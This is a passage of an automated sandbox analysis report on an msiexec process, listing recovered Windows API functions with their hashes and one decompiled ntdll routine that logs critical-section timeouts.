                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                                        • Opcode ID: afa76becf8bca2f31b49aa4fa586c7f102521296ac2c6e9abba55b2a352a7d91
                                                                                                                                                                                                        • Instruction ID: 1532a09314a0b601ad86704711d0fa40de783519dc99e8559e85ef0422a8ff95
                                                                                                                                                                                                        • Opcode Fuzzy Hash: afa76becf8bca2f31b49aa4fa586c7f102521296ac2c6e9abba55b2a352a7d91
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7E0126165430427E711EAA09C87F553BD49B49A54F4951A4F60DAB2C2D992E6014251
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E8A620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 00E8A64D
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                        • Opcode ID: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                                                                                                                                                                                        • Instruction ID: ef4319808746ed69cf8c0bc7e80d44d1086660de1abd220633d6145d41428948
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8BE012B1200208ABDB14EF89DC49EA737ACEF88750F118159BA0C6B242C630E9108AB1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E8A780 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E7D5C2,00E7D5C2,?,00000000,?,?), ref: 00E8A7B0
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                                                                        • Opcode ID: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                                                                                                                                                                                        • Instruction ID: 2b37bd296049d551e5bc0fd51da512548313063fc7b3ddbef02edd29c6fe1828
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CE01AB12002086BDB10EF49CC45EE737ADEF89654F118165BA0C67241C530E8148AB1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E7DA62 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00E78233,?), ref: 00E7DA5B
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                                        • Opcode ID: d6e9934096a47221f657a7b724859bf738d1e9d9f0c9fa25c38ae3cac76f7ec0
                                                                                                                                                                                                        • Instruction ID: 36acb34ed2313dc07e7e9639086e460f2c471f255585a4fedd005b484c0c4322
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6e9934096a47221f657a7b724859bf738d1e9d9f0c9fa25c38ae3cac76f7ec0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1D0A7A2BC438121FA25BAA04C87B6660D8FB54B90F945454E65EF22C3D853E0004055
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E7DA30 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00E78233,?), ref: 00E7DA5B
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                                        • Opcode ID: 785235cf212cd6fac8d19be006f72e66bb65ffde2b76f0b6724cfa02a8199225
                                                                                                                                                                                                        • Instruction ID: 59254e18d137eaf186652c9d97ddc7f4421b8dfa468c54ade31c78cf1eab1ae7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 785235cf212cd6fac8d19be006f72e66bb65ffde2b76f0b6724cfa02a8199225
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 06D0A77268430437F610EAE48C83F2633CCAB48B54F4940A4FA0DE73C3D950F4004164
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04DC967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540213481.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_4d60000_msiexec.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 7acf9721ad2b8da6c5b0fdc6ff5e1ff1c2b04c89e773952d49f6d6df3771c2f5
                                                                                                                                                                                                        • Instruction ID: 3132691443963d7b6150ddcc7d41549c2373426da15d1aa9bbb75cf660ddb2bf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7acf9721ad2b8da6c5b0fdc6ff5e1ff1c2b04c89e773952d49f6d6df3771c2f5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3DB09BB19414C5C9FB11D7A44608717791177D4745F16C155D1020755A4778D0D1F6B5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                        Function 04E1FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                        			E04E1FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04DCCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04E15720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04E15720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                                                                                                        0x04e1fdda
                                                                                                                                                                                                        0x04e1fde2
                                                                                                                                                                                                        0x04e1fde5
                                                                                                                                                                                                        0x04e1fdec
                                                                                                                                                                                                        0x04e1fdfa
                                                                                                                                                                                                        0x04e1fdff
                                                                                                                                                                                                        0x04e1fe0a
                                                                                                                                                                                                        0x04e1fe0f
                                                                                                                                                                                                        0x04e1fe17
                                                                                                                                                                                                        0x04e1fe1e
                                                                                                                                                                                                        0x04e1fe19
                                                                                                                                                                                                        0x04e1fe19
                                                                                                                                                                                                        0x04e1fe19
                                                                                                                                                                                                        0x04e1fe20
                                                                                                                                                                                                        0x04e1fe21
                                                                                                                                                                                                        0x04e1fe22
                                                                                                                                                                                                        0x04e1fe25
                                                                                                                                                                                                        0x04e1fe40

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04E1FDFA
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04E1FE01
                                                                                                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04E1FE2B
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540213481.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_4d60000_msiexec.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                                                                                                        • API String ID: 885266447-3903918235
                                                                                                                                                                                                        • Opcode ID: 369cc988a33b9915c5aaf5a617db4d24226e7d88c19ab345ea838b5e39a4e854
                                                                                                                                                                                                        • Instruction ID: 3ed215468c9a636cf79484edc55a49ba1ff77820f4de33cf8c9aa6e7f58a23dd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 369cc988a33b9915c5aaf5a617db4d24226e7d88c19ab345ea838b5e39a4e854
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1F0F632240241BFE6211A45DC02F23BF6BEB84730F140315F628561E1EAA2F86097F4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%